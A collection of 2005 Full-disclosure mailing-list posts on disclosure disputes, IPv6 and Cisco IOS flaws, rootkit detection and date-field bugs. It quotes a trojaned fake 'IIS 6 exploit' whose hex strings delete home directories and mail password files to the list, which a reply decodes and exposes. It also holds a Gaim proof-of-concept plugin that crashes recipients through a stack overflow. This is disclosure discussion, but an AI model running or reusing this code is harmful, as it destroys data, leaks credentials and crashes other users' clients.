>> uid=65534(nobody) gid=65534(nobody) euid=0(root) groups=65534(nobody)
>> <.>
>>
>>
>> Todd Miller, the maintainer of Sudo, was informed yesterday, and it
>> is strongly advised to "sudo su -c chmod -s sudo" until a patch is out.
>>
>>
>> J
>>
>> Joel Esler, GCIA
>>

Re: [Full-disclosure] Cisco IOS Shellcode Presentation

2005-07-31 Thread Ron DuFresne
On Sat, 30 Jul 2005, Micheal Espinola Jr wrote:

> It was Lynn's choice based on his statement to the press - and it was
> still his choice no matter what the coercion might have been.
>
> Larry had no right to take that choice away, and I doubt anyone
> here has the right nor the first-hand knowledge in order to pass
> judgement on the reasons for Lynn's choice.
>
> Based on Lynn's statements his motivation was patriotic.  Who are we
> to judge that was not his intent for his intellectual property?
>


I made no judgement about Lynn or the choices he may or may not have made
of his own free will, did I?  If so, where did I make such judgements in my
post?  I merely questioned how "free" his choices were after deciding that
his employer was not going to stop him from pushing this information to
the masses.  Seems to me that his "freely" made recent choices were
influenced; I think that is easy to read into the events as they have
progressed, do you not also?


> I ask you, how do you know it wasn't?
>





Thanks,

Ron DuFresne

> On 7/29/05, Ron DuFresne <[EMAIL PROTECTED]> wrote:
> > On Fri, 29 Jul 2005, Micheal Espinola Jr wrote:
> >
> > > That was a real dickhead thing to do.  The guy that wrote that made an
> > > agreement with Cisco of his own free will.  Who do you think you are
> > > to go against an agreement he made, with his own information?
> > >
> > > I sincerely hope it bites you in the arse.
> > >
> >
> > Was it free will, or the threat of jail and other difficulties?
> >
> > After all, employment was not a show stopper for him; he quit to release
> > his findings and gain glory in the crowds at hacker fests.  So was it
> > really free will, I ask again?
> >
> > Thanks,
> >
> > Ron DuFresne
> > --
> > "Sometimes you get the blues because your baby leaves you. Sometimes you 
> > get'em
> > 'cause she comes back." --B.B. King
> >***testing, only testing, and damn good at it too!***
> >
> > OK, so you're a Ph.D.  Just don't touch anything.
> >
> >
> >
>
>
>

-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.




Re: [Full-disclosure] Cisco IOS Shellcode Presentation

2005-07-29 Thread Ron DuFresne
On Fri, 29 Jul 2005 [EMAIL PROTECTED] wrote:

> On Fri, 29 Jul 2005 16:38:26 CDT, Ron DuFresne said:
>
> > being that we'll all be retired and all this equipment replaced by the
> > time IPv6 becomes standard the threat is not as great then as it was first
> > made out to be then, correct?
>
> Part of the problem is that IOS includes IPv6 support by default.
>
> How many sites that don't do IPv6 didn't do a 'no ipv6 enable' and 'no ipv6
> address' on *every* interface?
>

IPv6 has been hyped as the security shim of all shims for TCP/IP.  Even
able to cure the common cold, if implemented prior to mass
rollout/acceptance.  Which is why we are seeing many security admins on
various platforms not paying attention to security 101 tenets: if it's
not needed, disable/remove it.

I'm guessing now that many in the *nix as well as router realms will now
pay a tad more heed to the basics?


Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.




Re: [Full-disclosure] Cisco IOS Shellcode Presentation

2005-07-29 Thread Ron DuFresne
On Fri, 29 Jul 2005, Jason Coombs wrote:

> Madison, Marc wrote:
> >  Am I missing something here, because it seems that two vulnerabilities
> > are being discussed, one is the IPv6 DOS
> > http://www.cisco.com/warp/public/707/cisco-sa-20050729-ipv6.shtml.  And
> > the other is Lynn presentation on shellcode execution via the IOS?
>
> Did you read the advisory? It is not solely a DoS threat.
>
> "Cisco Internetwork Operating System (IOS ) Software is vulnerable to a
> Denial of Service (DoS) and potentially an arbitrary code execution
> attack from a specifically crafted IPv6 packet."

Being that we'll all be retired and all this equipment replaced by the
time IPv6 becomes standard, the threat is not as great then as it was first
made out to be, correct?





Thanks,

Ron DuFresne




Re: [Full-disclosure] Cisco IOS Shellcode Presentation

2005-07-29 Thread Ron DuFresne
On Fri, 29 Jul 2005, KF (lists) wrote:

> Trying to Stifle information is a real dickhead thing to do also...
>
> I'm just waiting for someone to toss the DMCA into all of this. =]


CERT and DHS are bigger cards in the game than DMCA.


Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.




Re: [Full-disclosure] Cisco IOS Shellcode Presentation

2005-07-29 Thread Ron DuFresne
On Fri, 29 Jul 2005, Micheal Espinola Jr wrote:

> That was a real dickhead thing to do.  The guy that wrote that made an
> agreement with Cisco of his own free will.  Who do you think you are
> to go against an agreement he made, with his own information?
>
> I sincerely hope it bites you in the arse.
>

Was it free will, or the threat of jail and other difficulties?

After all, employment was not a show stopper for him; he quit to release
his findings and gain glory in the crowds at hacker fests.  So was it
really free will, I ask again?

Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.




Re: [Full-disclosure] Beware trojaned exploits!

2005-07-27 Thread Ron

Hmm, I'm noticing a pattern.

Warning: don't download exploits from any sites that have an 'o'
replaced with a '0'!  The 0 obviously makes them less secure, or
something.



[EMAIL PROTECTED] wrote:
> Hackers may be at risk!
> 
> It has come to our attention that a large amount of public
> security exploits/software have been modified and re-posted
> to legitimate trusted information sites for public downloads.
> 
> We have recently came across 5 exploits that have had a shellcode
> modification
> after legit verification of trusted download sites.
> 
> The following information security sites have listed a number of
> modified exploits:
> 
> unl0ck security research
> g0tfault security
> m00 security
> 


Re: [Full-disclosure] Rooting Linux with a floppy

2005-07-15 Thread Ron

_Linux_ doesn't have a version 10, either.  Linux IS the kernel, whose
versions are 2.x (2.4.* and 2.6.* usually).

Maybe you're talking about a specific distribution? In which case,
that's a pretty inconsistent numbering system to use since Red Hat,
Mandrake, Slackware, etc. all use different numbering conventions.

James Longstreet wrote:
> On Fri, 15 Jul 2005, Lauro, John wrote:
> 
> 
>> 6.2?  What is that???  Latest kernel is 2.6...
> 
> 
> No, not kernel 6.2, LINUX 6.2.  You know, that old version.  Linux 10 has
> been out for months.
> 
> 


Re: [Full-disclosure] Re: alert: the 111111 bug

2005-07-06 Thread Ron DuFresne
On Mon, 4 Jul 2005, Thomas Binder wrote:

> Hi!
>
> On Sun, Jul 03, 2005 at 10:18:02PM -0500, Paul Schmehl wrote:
> > Not to worry.  The 11th of November, 2011 is a Saturday.  No one
> > will be working that day.  :-)
>
> Mhmm, it's a Friday according to my calendar - is mine or yours in
> error?
>


cal reports it as a Friday here also, damn, now I have to drive the 45
miles in for sure!

Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.




Re: [Full-disclosure] alert: the 111111 bug

2005-07-06 Thread Ron DuFresne
On Sun, 3 Jul 2005, Paul Schmehl wrote:

> --On July 4, 2005 12:03:02 AM +0100 lsi <[EMAIL PROTECTED]> wrote:
> >
> > For this customer 11/11/11 in the date field means, don't process
> > this record, which will obviously cause problems with legitimate
> > transactions on that date.
> >
> > I suspect using a new field to flag a state, instead of "special"
> > data, would have been more appropriate.
> >
> Not to worry.  The 11th of November, 2011 is a Saturday.  No one will be
> working that day.  :-)

Almost no one, though states tend to view weekends as merely an extension
to the week, and I'm likely going to have to be doing maintenance or
working indirectly from home as usual.


Thanks,

Ron DuFresne
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.




Re: [Full-disclosure] alert: the 111111 bug

2005-07-06 Thread Ron DuFresne


Of course, this is not a bug, but bad admin/dbadmin practice, for which
there are no patches available.

thanks,

Ron DuFresne

On Mon, 4 Jul 2005, lsi wrote:

> platforms affected: all
> distribution of threat: wide
> severity of threat: potentially serious
> leadtime: 6.3 years :)
>
> I noticed one of my customers using the "special" date of 11/11/11 in
> their database.
>
> I've since realised this practice might be quite widespread, and
> indeed warrants an alert that on or around the 11th of November 2011,
> some crazy things might happen, as folks' "special" dates collide
> with the real date of 11/11/11.
>
> For this customer 11/11/11 in the date field means, don't process
> this record, which will obviously cause problems with legitimate
> transactions on that date.
>
> I suspect using a new field to flag a state, instead of "special"
> data, would have been more appropriate.
>
> Apologies if this is old news for you.
>
> Stu
>
> ---
> Stuart Udall
> stuart [EMAIL PROTECTED] net - http://www.cyberdelix.net/
>
> ---
>  * Origin: lsi: revolution through evolution (192:168/0.2)
>
>

-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


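The sentinel-date collision lsi describes above, worked through as an added example (not code from the thread): one function applies the customer's "11/11/11 means skip" rule, one applies a dedicated flag column instead, and a third finds the rows carrying the sentinel so they can be reviewed before that date arrives. The records and the field names txn_id, txn_date and skip are constructed for the example.

```python
"""Sentinel-date collision: why "11/11/11 means skip" breaks on 2011-11-11.

Added example, not from the thread.  The records below are constructed and
the field names (txn_id, txn_date, skip) are assumptions.
"""
from datetime import date

# The "special" value the customer's application stores in the date field
# to mean "don't process this record".
SENTINEL = date(2011, 11, 11)

# Constructed sample table.  The fixed layout carries both the date and a
# dedicated skip flag so the two policies can be compared on the same rows.
RECORDS = [
    {"txn_id": 1, "txn_date": date(2011, 11, 10), "skip": False},
    {"txn_id": 2, "txn_date": SENTINEL,           "skip": True},   # placeholder row
    {"txn_id": 3, "txn_date": date(2011, 11, 11), "skip": False},  # real txn on 11/11/11
    {"txn_id": 4, "txn_date": date(2011, 11, 12), "skip": False},
]


def process_with_sentinel(records):
    """Original scheme: the date value itself carries the 'skip' meaning.
    Returns the txn_ids that would be processed.  Any genuine transaction
    dated 2011-11-11 is indistinguishable from a placeholder and is lost."""
    return [r["txn_id"] for r in records if r["txn_date"] != SENTINEL]


def process_with_flag(records):
    """Fixed scheme: a dedicated boolean column says whether to process;
    the date column holds only dates, so no date is 'special'."""
    return [r["txn_id"] for r in records if not r["skip"]]


def find_sentinel_rows(records, sentinel=SENTINEL):
    """Detection / migration helper: rows whose date equals the sentinel.
    Each needs a human decision: a placeholder (set skip=True and clear
    the date) or a real transaction that happens to fall on that day."""
    return [r["txn_id"] for r in records if r["txn_date"] == sentinel]


def lost_transactions(records):
    """Legitimate records the sentinel scheme silently drops: those the
    flag scheme processes but the sentinel scheme does not."""
    return sorted(set(process_with_flag(records)) - set(process_with_sentinel(records)))


if __name__ == "__main__":
    print("sentinel scheme processes:", process_with_sentinel(RECORDS))  # [1, 4]
    print("flag scheme processes:    ", process_with_flag(RECORDS))      # [1, 3, 4]
    print("rows carrying the sentinel:", find_sentinel_rows(RECORDS))    # [2, 3]
    print("silently dropped:          ", lost_transactions(RECORDS))     # [3]
```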


Re: [Full-disclosure] RE: End users as security devices

2005-06-13 Thread Ron DuFresne


>
> Don't lose faith, don't give up, keep explaining, and training. You CAN
> make end users proactive participants in enterprise security. Just
> remember, there will always be a few intellectually challenged folks who
> need a bit of extra mentoring. Try to be patient, and NO, you can't put
> handicap placards on computers used by those with IQs  below 90, sorry.
>

If this were true, then educating would not be a full-time thing making
some companies tons of cash as they come into an org and do it over and
over and over.

Thanks,

Ron DuFresne

-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.




[Full-disclosure] Gaim 1.2.1 -- PoC Stack Overflow

2005-05-13 Thread Ron
Product: Gaim
Version: 1.2.1
Remote: Yes
Effect: DoS, potential arbitrary code execution
Date: May 13, 2005
I was looking at the stack overflow reported in Gaim 1.2.1.  It's 
actually pretty trivial to find.  The line that contains it looks like this:

strcpy(url_buf, gurl_buf->str);
url_buf is an 8192-byte buffer, and gurl_buf->str is an email address 
that is being displayed (user controlled).

The difficulty in writing a real exploit is that the input is sanitized, 
so any character over 128, as well as ' ', ',', '\n', '<', and others 
are stripped away.  This doesn't leave much to play with, although I'm 
still confident that it would be possible to write an exploit under 
these conditions.  I just don't have the motivation to do it :)

Another difficulty is that most chat protocols limit you to a reasonable 
message size, and 8192 is typically well above that size.  So even if 
you could successfully create an exploit, you would still have to do it 
on a chat protocol that allows very long messages. 

The final difficulty is that you also process the URL locally, when you 
send it, but that's not really a big deal.  It would be trivial to 
filter it out in a plugin to make sure you don't crash yourself.

For this example, I just threw together a quick plugin which sends a 
10002-character email address when the user types "/vuln".  Gaim crashes 
at the address 0x41414141.

---
(gdb) run
Starting program: /usr/local/bin/gaim
[Thread debugging using libthread_db enabled]
[New Thread 16384 (LWP 24908)]
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 16384 (LWP 24908)]
0x41414141 in ?? ()
---
So in a real situation, this can be done.  It's just difficult.
If anybody is actually able to use this for anything, please let me 
know.  I'd be interested how this can be exploited.

-Ron


// Written by Ron <[EMAIL PROTECTED]>
// Friday, May 13, 2005
//
// This is a very weak demonstration of Gaim 1.2.1's stack overflow vulnerability
// when processing email addresses.  What this basically does is segfault you
// when you do a /vuln command in a conversation, and, if you're using a protocol
// that allows a 10002-character message to go through, also segfaults the person
// you sent it to.  The reason is that gaim's stack is overwritten with a whole
// bunch of 'A's, and the return address of the function ends up at 0x41414141.
// That's no good for anybody.
//
// This code should be considered public domain, and is freely
// modifiable/distributable by any and everyone.
//
// Note:
// To compile, place this in the "plugins" directory of Gaim's source
// (gaim-1.2.1/plugins) and type "make vuln-plugin.so".  This will compile
// vuln-plugin.so.  Then put it in ~/.gaim/plugins, restart gaim, and load it
// as a plugin.


#include  
#include 
#include 
#include 
#include 
#include 
#include 

#include "internal.h"
#include "gtkgaim.h"

#include "debug.h"
#include "signals.h"
#include "util.h"
#include "version.h"
#include "cmds.h"
#include "conversation.h"

#include "gtkplugin.h"
#include "gtkutils.h"

#define ME "1.2.1 Vuln Check"
#define MAXLENGTH 1024
#define XMMS_PLUGIN_VERSION "I am a test plugin to check for URL encoding vulnerability."

static GaimCmdId cmd;


char *code = "[EMAIL PROTECTED]";

gboolean go(GaimConversation *conv, const gchar *cmd, gchar **args, gchar 
**error, void *data)
{
gaim_conv_im_send(GAIM_CONV_IM(conv), code);

return GAIM_CMD_STATUS_OK;
}

static gboolean plugin_load(GaimPlugin *plugin)
{
cmd = gaim_cmd_register("vuln", "", GAIM_CMD_P_DEFAULT, 
GAIM_CMD_FLAG_IM, NULL, (GaimCmdFunc)go, "/vuln", NULL);

return TRUE;
}

static gboolean plugin_unload(GaimPlugin *plugin)
{
gaim_cmd_unregister (cmd);

return TRUE;
}

static GaimPluginInfo info =
{
GAIM_PLUGIN_MAGIC,
GAIM_MAJOR_VERSION,
GAIM_MINOR_VERSION,
GAIM_PLUGIN_STANDARD,            /**< type           */
NULL,                            /**< ui_requirement */
0,                               /**< flags          */
NULL,                            /**< dependencies   */
GAIM_PRIORITY_DEFAULT,           /**< priority       */
NULL,                            /**< id             */
N_("1.2.1 Email Overflow Demo"), /**< name           */
VERSION,                         /**< version        */

Re: [Full-disclosure] (no subject)

2005-04-22 Thread Ron
lmao
root = you
kfinisterre = are
dotslash = so
mandark = lame
dognutz = for
elguapo = cracking
m0ssimo = this
KF (lists) wrote:


Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer OverflowExploit(was broken)

2005-04-21 Thread Ron DuFresne
On Thu, 21 Apr 2005, bkfsec wrote:

> Day Jay wrote:
>
> >I think it's a whole lot of trouble to the newbie
> >beginners who probably ran it the first time.
> >
> >Lamers. Heh.
> >
> >
> >
> >
> I haven't seen any evidence as of yet that anyone ran this code on a
> segment connected to the network (seeing as I haven't seen any passwd or
> shadow files posted to the list...) indicating that most people probably
> ran it (if anyone ran it at all) from test machines.
>
>   -Barry
>

Barry,

Waste not your time on jj, or dj, or whatever; it is not worth the effort.  They
have an early history with the list and all, dating back to the phracker
crew on efnet and this list's early days, never contributing much worth
reading or considering.  And taken from recent posts and comments, they are
likely the type to kick crutches out from under handicapped folks and the
like.  Do as the rest of us tend to and add 'em to yer procmail filters to
dead-end 'em; why even waste the time hitting delete?


Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.




Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-21 Thread Ron
The ONLY posts I don't like are posts like that, complaining about the 
list.  Like somebody else said, the rest of this list provides great 
"comic relief"!

Javi Polo wrote:
> On Apr/20/2005, Day Jay wrote:
>
> > You are wrong again, it's "Smashing the Stick" you
> > moron. Not smashing the stack. Ask anyone here!
> > Man, you are such a newbie. Get a clue and stop trying
> > to say the sweet code is a backdoor just because you
> > don't know how to compile software properly. You're
> > nothing but a newbie wanna be C programmer with a dick
> > in his ass and a lack of hacking skills.
>
> .
> Should this list be moderated?
> it's starting to be a pile of shit ... :/



Re: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit

2005-04-18 Thread Ron
haha, nice:
/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe
cat /etc/shadow |mail full-disclosure@lists.grok.org.uk
cat /etc/passwd |mail full-disclosure@lists.grok.org.uk
lol @ anybody who does it. 

Day Jay wrote:
/* Proof of concept code
  Please don't send us e-mails
  asking us "how to hack" because
  we will be forced to skullfsck you.
DISCLAIMER:
!!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
  IIS 6 Buffer Overflow Exploit
  BUG: inetinfo.exe improperly bound checks
  http requests sent longer than 6998 chars.
  Can get messy but enough testing, and we have
  found a way in.
  VENDOR STATUS: Notified
  FIX: In process
  Remote root.
  eg.
  #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
   + Connecting to host...
   + Connected.
   + Inserting Shellcode...
   + Done...
   + Spawining shell..
   Microsoft Windows XP [Version 5.1.2600]
  (C) Copyright 1985-2001 Microsoft Corp.
  C:\>

*/
char shellcode[] =
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
"\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
"\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
"\x72\x3b\x65\x63\x68\x6f\x20\x62"
"\x6c\x34\x63\x6b\x68\x34\x74\x2c"
"\x68\x65\x68\x65";
char launcher [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
"\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
char netcat_shell [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
"\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
main()
{
//Section Initialises designs implemented by mexicans
//Imigrate
system(launcher);
system(netcat_shell);
system(shellcode);
//int socket = 0;
//double long port = 0.0;
//#DEFINE port host address
//#DEFINE number of inters
//#DEFINE gull eeuEE
// for(int j; j < 30; j++)
   {
   //Find socket remote address fault
   printf(".");
   }
//overtake inetinfo here IIS_66^
return 0;
}

		

 



RE: [Full-disclosure] Re: Case ID 51560370 - Notice of ClaimedInfringement

2005-04-07 Thread Ron DuFresne
On Thu, 7 Apr 2005, Poof wrote:

[SNIP]

> That's why if you wanted, you could sell bags of flour as cocaine and not be
> charged with drug dealing. Fine, it looks the same and weighs the same,
> however it isn't the product that's illegal. And to prove that it's illegal,
> they need to test it.
>

Actually, at least in the US, there is a law that would make this illegal and subject one to prison time...


Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.




RE: [Full-disclosure] windows linux final study

2005-03-29 Thread Ron DuFresne
On Tue, 29 Mar 2005, Lachniet, Mark wrote:

> Curmudgeon,
>
> Yes, but did you actually verify their research using their methodology
> to see if they screwed up?
>

[SNIP]

But, if the conclusions are patently false, to say the least, does it
matter if the underlying methodology has any tendency to soundness?  

Thanks,


Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.




Re: [Full-disclosure] windows linux final study

2005-03-29 Thread Ron
Well, the only reply to that would be:
Since the catholic church say God exists and they have a vested interest
in the matter they must be lying.  Therefore God doesn't exist.  I rest
my case.
 

Of course I'd be skeptical of their proof.  If the Republicans came out 
with proof that Democrats suck, I'd be skeptical.  When a commercial 
says "we are proven to have the best rates" I'm skeptical. 

"Statistics can be used to prove anything - 53% of all people know that"
Statistics can be skewed, important numbers can be ignored, numbers can 
be used to prove different things if used cleverly, and an experiment 
can be designed in such a way to favor one side (a bias).  That's why, 
for an experiment involving statistics, I want to see a neutral party 
finding the results.

But that's just me.  That's no more than an argument against the theory. 



RE: [Full-disclosure] Lameness

2005-03-24 Thread Ron DuFresne
On Thu, 24 Mar 2005, David Chastain wrote:

> It sounds then like its reputation has already been labeled??? Is there a 
> moderator that can take control a little and maybe get FD back on the 
> right track?
>
>

From the headers of your posting here:

List-Id: An unmoderated mailing list for the discussion of security issues


Thanks,


Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.




Re: [Full-disclosure] Re: choice-point screw-up and secure hashes

2005-03-19 Thread Ron DuFresne
On Sat, 19 Mar 2005, Vincent van Scherpenseel wrote:

> On Saturday 19 March 2005 13:02, Kurt Seifried wrote:
> > > Don't forget that it's bad for the company's image to have confidential
> > > customer data stolen. As soon as the press catches on it's bad for
> > > business.
> > > So, companies *do* have a drive to secure your private data.
> >
> > Uhhh no. See consumers such as yourself don't actually purchase services
> > from choicepoint/etc (unless you're a Nigerian guy who is into ID theft =).
> > Businesses do. And businesses don't care if choicepoint is secure or not,
> > they care if choicepoint has the data. It's like Equifax, you don't buy
> > information from them, companies you deal with do. These firms have no
> > incentive to protect your information, because they'll never lose your
> > business.
>
> Consumer A pays for a service from Company B which uses a payment method from
> Company C. Company C holds data from Consumer A for Company B. Now, C gets
> compromised and data from A is stolen. Don't you think the consumer will
> knock on Company B's door? The consumer doesn't deal with Choicepoint, the
> consumer deals with the company, as you said. Now, Company B has been found
> responsible for the mess by the consumer. Don't you think B will now knock on
> C's door?


Do you know which companies trade and buy personal data from your bank,
insurance company, the utilities, your city and county, your ISP, ...?

How many people knew of, let alone know, which companies choice-point
obtained their data from?  Quite often putting pressure on company C is
not a straightforward matter for the public at large.

Thanks,

Ron DuFresne


Re: [Full-disclosure] Re: choice-point screw-up and secure hashes

2005-03-19 Thread Ron DuFresne
On Sat, 19 Mar 2005, Kurt Seifried wrote:

> > Don't forget that it's bad for the company's image to have confidential
> > customer data stolen. As soon as the press catches on it's bad for
> > business.
> > So, companies *do* have a drive to secure your private data.
>
> Uhhh no. See consumers such as yourself don't actually purchase services
> from choicepoint/etc (unless you're a Nigerian guy who is into ID theft =).
> Businesses do. And businesses don't care if choicepoint is secure or not,
> they care if choicepoint has the data. It's like Equifax, you don't buy
> information from them, companies you deal with do. These firms have no
> incentive to protect your information, because they'll never lose your
> business.
>
> Sorry to break it to you, but there are no market forces to drive these
> companies to better security.
>

Let alone the fact that people, individuals, tend to have very short term
memories of such events, unless directly affected by the event.

Thanks,

Ron DuFresne


Re: [Full-disclosure] Microsoft GhostBuster Opinions

2005-03-18 Thread Ron DuFresne
On Fri, 18 Mar 2005, dk wrote:

> Ron DuFresne wrote:
>
> > If the kernel is modified, on a windows or *nix system, you are going to
> > have a clear clue upfront;  the system will have rebooted.  Course, a
>
> That's a dangerous position to believe, at least with the linux kernel
> (man insmod). Aside from just loading a kernel module that wraps system
> calls, one has been able to directly modify kernel memory for years,
> even without kernel bugs. Hence the utility of PaX, grsec, etc, etc.
>
> In fact a few popular RK's do just this via /dev/kmem (bypassing module
> loading) and the like do they not? (like suckit??)
>
> Further research might be in order.  ;-)
>
> http://www.l0t3k.org/biblio/kernel/english/runtime-kernel-kmem-patching.txt
>
> http://www.phrack.org/show.php?p=58&a=7
>
> http://www.l0t3k.org/security/docs/rootkit/
>


agreed, thanks again to you and the earlier posters for correcting me.

Thanks,

Ron DuFresne


RE: [Full-disclosure] Microsoft GhostBuster Opinions

2005-03-18 Thread Ron DuFresne
On Fri, 18 Mar 2005, Todd Towles wrote:

>
> Dave wrote:
>
> > About Tripwire, I understand what it does.  It basically
> > runs a file integrity check on certain files and reports the
> > differences from the last (hopefully known good) scan.  Say
> > that Tripwire is running on a system that's been compromised
> > by a rootkit that's been designed to evade file integrity
> > checkers such as tripwire.  Since the rootkit has control of
> > the kernel it has control of all the low level functions,
> > like returning a file when asked for one.  So one way to
> > evade tripwire would be to return the real file when asked
> > for it in read-only mode and return the rootkit file when
> > asked for it in execution mode.  That way tripwire won't
> > think the file has changed, since it's being given the same
> > file as it checked before, but when the file is executed then
> > it's the malicious file.
>
> But could this not be bypassed by running Tripwire from a bootable CD?
> The modified kernel would be inactive and therefore you would see the
> two separate files as opposed to just one. This is the idea that this
> new Microsoft product uses, but as people have stated, this can be done
> now with a combination of open-source products.


Nowadays, with the price of drives and devices being hot swappable, this is
even easier to deal with, at least in suspected cases of system tampering;

where I work we tend to make dd or rsync copies of the running drive to a
backup drive.  Most of the servers allow hot swapping out these secondary
drives.  If the main drive fails I can boot off the backup; if I suspect a
problem with the integrity of the main file system, I can place the drive
in another system, mount it and run a tripwire against that.

As for that LKM that can keep two copies of a file on the system and send
one for reads and execute another, that's pretty advanced, and would have
to evade the differences that the various tripwire signatures are going to
produce on a file or filesystem that has been moved and altered in this
fashion.  Or take advantage of those places, and there are many, that
don't properly keep the tripwire db on read only media and alter those
sigs contained therein.  At this point it's perhaps mostly hypothetical as
I'm unaware of rootkits that can accomplish that.

The poster talking about alternate data streams on ntfs systems, that's a
problem to get around still on those platforms.

To the original reply and other poster, thanks for the links to alternate
URL's for the old paper on kernel hacking!

Thanks,

Ron DuFresne
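The offline check Ron describes (copy the drive, mount it on a trusted box, hash the files there) and the cross-view comparison from the quoted GhostBuster discussion (live listing vs. listing taken from a clean boot), as an added shell example that is not from the thread and is not tripwire or any product. It assumes GNU coreutils sha256sum plus POSIX find/awk/comm, and the function names (manifest_dir, compare_manifests, hidden_from_live, demo_run) and the sample tree it builds under a temp directory are all constructed for the illustration.

```shell
#!/bin/sh
# Added illustration (not from the thread, not tripwire): an offline integrity
# check plus a cross-view listing diff. Assumes GNU coreutils sha256sum and
# POSIX find/awk/comm. All sample files below are constructed in a temp dir.

# manifest_dir DIR -> tab-separated "relative/path<TAB>sha256", sorted by path.
# Run this against a copy mounted on a trusted system, not the live root.
manifest_dir() {
    (cd "$1" && find . -type f | LC_ALL=C sort | while IFS= read -r f; do
        h=$(sha256sum "$f" | cut -d' ' -f1)
        printf '%s\t%s\n' "${f#./}" "$h"
    done)
}

# compare_manifests BASELINE CURRENT -> "MISSING p", "ADDED p", "CHANGED p" lines
compare_manifests() {
    awk -F'\t' '
        FILENAME == ARGV[1] { base[$1] = $2; next }
        { cur[$1] = $2 }
        END {
            for (p in base) if (!(p in cur)) print "MISSING " p
            for (p in cur)  if (!(p in base)) print "ADDED " p
            for (p in cur)  if ((p in base) && base[p] != cur[p]) print "CHANGED " p
        }' "$1" "$2" | LC_ALL=C sort
}

# hidden_from_live LIVE_LIST OFFLINE_LIST -> paths seen offline but not by the
# live system: the cross-view difference the quoted posts describe.
hidden_from_live() {
    live=$(mktemp); off=$(mktemp)
    LC_ALL=C sort -u "$1" > "$live"
    LC_ALL=C sort -u "$2" > "$off"
    LC_ALL=C comm -13 "$live" "$off"
    rm -f "$live" "$off"
}

# demo_run: constructed known-good tree vs. a copy with one tampered file and
# one file that the (simulated) live listing does not show.
demo_run() {
    w=$(mktemp -d)
    mkdir -p "$w/good/bin" "$w/good/etc" "$w/copy/bin" "$w/copy/etc" "$w/copy/lib"
    printf 'ls-binary-v1\n' > "$w/good/bin/ls"
    printf 'root:x:0:0\n'   > "$w/good/etc/passwd"
    printf 'ls-binary-v1\n' > "$w/copy/bin/ls"          # unchanged
    printf 'root::0:0\n'    > "$w/copy/etc/passwd"      # tampered
    printf 'constructed\n'  > "$w/copy/lib/.hidden.so"  # added, unlisted live
    manifest_dir "$w/good" > "$w/base.tsv"
    manifest_dir "$w/copy" > "$w/cur.tsv"
    compare_manifests "$w/base.tsv" "$w/cur.tsv"
    # Simulated live 'find' output that omits the added file; the offline
    # listing is taken from the manifest made on the mounted copy.
    printf 'bin/ls\netc/passwd\n' > "$w/live.txt"
    cut -f1 "$w/cur.tsv" > "$w/offline.txt"
    hidden_from_live "$w/live.txt" "$w/offline.txt" | sed 's/^/HIDDEN /'
    rm -rf "$w"
}

demo_run
```

The baseline manifest only means something if it was taken from a known-good state and kept on read-only media, which is the point Ron makes about tripwire databases.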


Re: [Full-disclosure] Social Engineering: You Have Been A Victim

2005-03-17 Thread Ron DuFresne
